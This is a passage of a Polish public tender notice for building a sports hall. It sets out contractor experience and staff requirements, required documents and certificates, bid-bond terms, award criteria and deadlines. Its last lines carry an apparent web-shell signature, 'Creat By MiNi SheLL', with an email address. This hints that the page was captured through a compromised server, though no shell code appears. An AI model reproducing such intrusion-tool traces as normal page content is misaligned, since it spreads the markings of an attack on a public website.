                3.1) jeżeli wykaże, że wykonał w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, w okresie ostatnich 5 lat (słownie: pięciu lat) przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 2 zamówienia na wykonanie robót budowlanych polegających na budowie, budynku hali sportowej o wartości min. 10 000 000,00zł brutto każda, w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Wartości podane w dokumentach potwierdzających spełnienie warunku w walucie innej niż wskazane przez Zamawiającego, Wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia świadectwa przejęcia (dla kontraktów realizowanych zgodnie z warunkami FIDIC) lub na dzień podpisania protokołu odbioru robót lub równoważnego dokumentu - w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia.

3.2) wykaże, że skierowane przez wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialne za kierowanie robotami budowlanymi osoby, legitymują się kwalifikacjami zawodowymi i doświadczeniem odpowiednimi do funkcji, jakie zostaną im powierzone oraz informacją o podstawie do dysponowania tymi osobami.

3.2.2) Osoba proponowana do pełnienia funkcji Kierownika budowy:
Minimalne doświadczenie i kwalifikacje zawodowe:
a)	posiada odpowiednie uprawnienia budowlane pozwalające na pełnienie samodzielnej funkcji technicznej  Kierownika budowy do realizacji zadania objętego niniejszym zamówieniem, min. 2 lata doświadczenia z uprawnieniami o specjalności konstrukcyjno-budowlanej bez ograniczeń
b)	Pełnił funkcje Kierownika budowy na zrealizowanym i rozliczonym zadaniu współfinansowanym ze środków UE i krajowych 1 zamówienie na wykonanie robót budowlanych o podobnym charakterze o wartości nie mniejszej niż 10 000 000,00zł. 

3.2.2) Wykonawca  winien wykazać, iż:
a)	dysponuje minimum 1 osobą odpowiedzialną za kierowanie robotami posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń;
b)	dysponuje minimum 1 osobą odpowiedzialną za kierowanie robotami posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
c)	wielkość średniego rocznego zatrudnienia u wykonawcy robót budowlanych oraz liczebności personelu kierowniczego wyniosła minimum 20 osób w okresie ostatnich pięciu latach przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy w tym okresie. 
1.	Wykonawca może w celu potwierdzenia warunków, w stosownych sytuacjach oraz w odniesieniu konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków prawnych.
2.	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (jak również wywiązują się z prawnych zobowiązań płacenia podatków, świadczeń socjalnych oraz spełniają wymogi prawa). Do zawarcia umowy pomiędzy Oferentem i podwykonawcą niezbędna jest zgoda Zamawiającego. Zawarcie umowy przez podwykonawcę z dalszym podwykonawcą wymaga zgody Zamawiającego i Oferenta (brak pisemnego sprzeciwu bądź innych pisemnych zastrzeżeń ze strony Zamawiającego w terminie 7 dni od doręczenia Zamawiającemu przez Oferenta umowy z podwykonawcą  i przez podwykonawcę z dalszym podwykonawcą wraz z częścią dokumentacji dotyczącej wykonania robót określonych w umowie, oznacza zgodę na zawarcie umowy).
3.	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w art. 25 a ust.1.
4.	W przypadku wspólnego ubiegania się o zamówienia wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunki określone w pkt 2  niniejszego rozdziału spełniają łącznie. Natomiast warunek określony w pkt. 1 ppkt. 1 niniejszego rozdziału winien spełniać każdy z wykonawców wspólnie ubiegających się o zamówienie (składając wspólną ofertę).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	Oświadczenie upoważnionego przedstawiciela wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w rozdz. V pkt 2 SIWZ (Załącznik D)
2)	Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego na podstawie okoliczności, o których mowa w art. 24 ust 1 ustawy Prawo zamówień publicznych (Załącznik C). 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania (wzór wykazu wykonanych robót stanowi Załącznik F) oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Uwaga: Dowodami o których mowa powyżej są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty.

2)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu kadry stanowi Załącznik H). 
3)	wykaz potencjału technicznego, niezbędnego do wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami (Załącznik G).
4)	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty zależy dołączyć, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust 1 i 2 ustawy Pzp. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana jako najkorzystniejsza, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego, umowę regulującą współpracę tych Wykonawców .
5)	W sytuacji, gdy Wykonawca przy wykazywaniu spełnienia warunków udziału w postępowaniu, polega 
na zdolności lub sytuacji innych podmiotów na zasadach określonych w rozdz. V pkt 3.2.2/1 zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiają w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia (oryginał). 
Z treści dokumentu musi jasno wynikać:
 a) jaki jest zakres dostępnych Wykonawcy zasobów innego podmiotu,
 b) w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, 
c) jakiego charakteru stosunki będą łączyły Wykonawcę z innym podmiotem, 
d) jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia. 6) Oprócz oświadczeń lub dokumentów jakie mają dostarczyć Wykonawcy w celu wstępnego 
potwierdzenia spełnienia warunków udziału w postępowaniu, zobowiązani są również dołączyć do oferty: 
a) dokumenty, z których będzie wynikało, że oferta podpisana jest przez osoby uprawnione (np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki), 
b) jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie będzie wynikało z załączonego dokumentu należy dołączyć także pełnomocnictwo w oryginale lub w postaci kopii poświadczonej notarialnie. 
7) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w SIWZ: 
1) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że: - nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
2) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa zastępuje się je dokumentem zawierającym oświadczenie wykonawcy, ze wskazaniem osoby lub osób uprawionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem, lub przed organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania tej osoby. 
3) Dokumenty, o których mowa powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8) Formularz oferty, kosztorysy ofertowe, oświadczenia należy złożyć w formie oryginału. 
Natomiast pozostałe dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej ,,za zgodność z oryginałem przez Wykonawcę. 
9) Dokumenty powinny być podpisane przez osoby uprawnione do składania oświadczeń woli. 
10) Pełnomocnictwa należy złożyć w formie oryginału lub kopii potwierdzonej notarialnie. 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Certyfikaty do specyfikacji:
	Atest Higieniczny PZH 
	Deklaracja Właściwości Użytkowych 
	Certyfikat IHF (Międzynarodowego Związku Piłki Ręcznej)
	Certyfikat EHF (Europejskiego Związku Piłki Ręcznej)
	Certyfikat FIBA  (Międzynarodowego Związku Piłki Koszykowej)
	Certyfikat FIVB APPROVED Official Supplier  (Międzynarodowego Związku Piłki Siatkowej)
	Autoryzacja Producenta Wykładziny dla Wykonawcy na przedmiotową inwestycję
	Karta Techniczna Wykładziny 
6.6 Podłoga sportowa w korcie musi posiadać certyfikat WSF i wys. 7cm
6.10 Dolna blacha autu (TIN) musi być wykonana z aluminium i musi posiadać możliwość regulowania wysokości w zakresie 430mm-480mm i nie może posiadać szczeliny między podłogą sportową, w której mogłaby pozostawać piłka podczas gry. TIN musi posiadać certyfikat WSF (Word Squash Federation)</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />X.	Wymagania dotyczące wadium.

1.	Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy: 
1) pieniądzu, 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3) gwarancjach bankowych, 
4) gwarancjach ubezpieczeniowych, 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275 z późn. zm.).
2.	Zamawiający żąda wniesienia wadium w kwocie: 200.000,00 zł, (słownie: dwieście tysięcy złotych 00/100).
3.	Wadium wnosi się przed upływem terminu składania ofert. 
4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na konto BZ WBK SA Oddział Jaworzyna Śląska
nr 81 1090 2369 0000 0001 0258 2272
5.	W przypadku wnoszenia wadium w pieniądzu Zamawiający uzna, że wadium zostało wniesione w terminie, o którym mowa w rozdziale XIII pkt 1 niniejszej SIWZ, jeżeli znajdzie się ono na rachunku bankowym Zamawiającego, przed upływem tego terminu. Brak wadium na koncie Zamawiającego we wskazanym powyżej terminie spowoduje wykluczenie Wykonawcy. 
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w Urzędzie Miejskim w Jaworzynie Śląskiej sekretariat lub dołączyć do oferty. 
7.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być co najmniej gwarancją: bezwarunkową, nieprzenośną, nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego. 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin realizacji</td><td>20</td></tr><tr><td>okres gwarancji</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 28/09/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                tak
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com